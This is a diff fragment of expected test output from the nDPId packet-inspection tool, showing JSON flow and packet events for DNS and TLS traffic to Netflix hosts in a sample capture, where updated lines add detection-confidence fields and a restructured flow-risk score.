+00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6401,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1484319114365,"flow_last_seen":1484319114384,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1484319114384,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":1,"rsp_addr":"52.32.22.214"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6406,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114406,"flow_last_seen":1484319114406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319114406,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6406,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1484319114406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319114406,"pkt":"gCqoTGHM5JjWH70UCABFAABAaktAAEAGw8fAqAEHNCAW1s\/2Abt+TgYJAAAAALAC\/\/\/LHgAAAgQFtAEDAwUBAQgKH2XpygAAAAAEAgAA"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6412,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1484319114455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319114455,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGRPc0IBbWwKgBBwG7z\/ZJSmsOfk4GCqASOJAVRAAAAgQFtAQCCAq2sSMxH2XpygEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6414,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1484319114457,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319114457,"pkt":"gCqoTGHM5JjWH70UCABFAAA03p5AAEAGT4DAqAEHNCAW1s\/2Abt+TgYKSUprD4AQEBVsWgAAAQEICh9l6fy2sSMx"}
-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6416,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319114406,"flow_last_seen":1484319114464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1484319114464,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6423,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319114406,"flow_last_seen":1484319114523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"ts_msec":1484319114523,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01246{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6425,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319114406,"flow_last_seen":1484319114556,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"ts_msec":1484319114556,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}}
+00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6416,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319114406,"flow_last_seen":1484319114464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1484319114464,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6423,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319114406,"flow_last_seen":1484319114523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"ts_msec":1484319114523,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01352{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6425,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319114406,"flow_last_seen":1484319114556,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"ts_msec":1484319114556,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6721,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117511,"flow_last_seen":1484319117511,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1484319117511,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6721,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1484319117511,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"ts_msec":1484319117511,"pkt":"gCqoTGHM5JjWH70UCABFAABT2RsAAP8RXyXAqAEHwKgBAct\/ADUAP5\/hcXUBAAABAAAAAAAACmFwaS1nbG9iYWwHbGF0ZW5jeQZwcm9kYWEHbmV0ZmxpeANjb20AAAEAAQ=="}
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6721,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117511,"flow_last_seen":1484319117511,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1484319117511,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6721,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117511,"flow_last_seen":1484319117511,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1484319117511,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6726,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1484319117538,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"ts_msec":1484319117538,"pkt":"5JjWH70UgCqoTGHMCABFAADT4UxAAEAR1XTAqAEBwKgBBwA1y38Av8eGcXWBgAABAAgAAAAACmFwaS1nbG9iYWwHbGF0ZW5jeQZwcm9kYWEHbmV0ZmxpeANjb20AAAEAAcAMAAEAAQAAACsABDQpHgXADAABAAEAAAArAAQ0KVZPwAwAAQABAAAAKwAENCnkd8AMAAEAAQAAACsABDQpn7bADAABAAEAAAArAAQ0J+8jwAwAAQABAAAAKwAENCc7i8AMAAEAAQAAACsABDQo+f3ADAABAAEAAAArAAQ0KRH0"}
-00769{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6726,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319117511,"flow_last_seen":1484319117538,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1484319117538,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.41.30.5"}}
+00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6726,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319117511,"flow_last_seen":1484319117538,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1484319117538,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.41.30.5"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6744,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117605,"flow_last_seen":1484319117605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319117605,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6744,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1484319117605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319117605,"pkt":"gCqoTGHM5JjWH70UCABFAABArFRAAEAGeobAqAEHNCkeBc\/3Abv7qhZTAAAAALAC\/\/8qUQAAAgQFtAEDAwUBAQgKH2X1uAAAAAAEAgAA"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6755,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117651,"flow_last_seen":1484319117651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319117651,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6755,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1484319117651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319117651,"pkt":"gCqoTGHM5JjWH70UCABFAABAO7RAAEAG8l7AqAEHNCAW1tAAAbtmeMEgAAAAALAC\/\/8btwAAAgQFtAEDAwUBAQgKH2X15gAAAAAEAgAA"}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6758,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1484319117664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319117664,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGPb80KR4FwKgBBwG7z\/fOmYqt+6oWVKASOJB9NwAAAgQFtAQCCAqh\/Yo1H2X1uAEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6761,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1484319117667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319117667,"pkt":"gCqoTGHM5JjWH70UCABFAAA0nQxAAEAGidrAqAEHNCkeBc\/3Abv7qhZUzpmKroAQEBXUQwAAAQEICh9l9fSh\/Yo1"}
-00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6764,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117605,"flow_last_seen":1484319117668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1484319117668,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6764,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117605,"flow_last_seen":1484319117668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1484319117668,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6772,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1484319117703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319117703,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGRPc0IBbWwKgBBwG70ABfA575ZnjBIaASOJAZDQAAAgQFtAQCCAq2sSZcH2X15gEDAwg="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6773,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1484319117704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319117704,"pkt":"gCqoTGHM5JjWH70UCABFAAA0fsVAAEAGr1nAqAEHNCAW1tAAAbtmeMEhXwOe+oAQEBVwIwAAAQEICh9l9hi2sSZc"}
-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6774,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117651,"flow_last_seen":1484319117713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1484319117713,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6776,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117605,"flow_last_seen":1484319117737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"ts_msec":1484319117737,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-01365{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6777,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117605,"flow_last_seen":1484319117738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3413,"flow_avg_l4_payload_len":487,"midstream":0,"ts_msec":1484319117738,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6789,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117651,"flow_last_seen":1484319117770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"ts_msec":1484319117770,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01246{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6790,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117651,"flow_last_seen":1484319117771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"ts_msec":1484319117771,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}}
+00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6774,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117651,"flow_last_seen":1484319117713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1484319117713,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
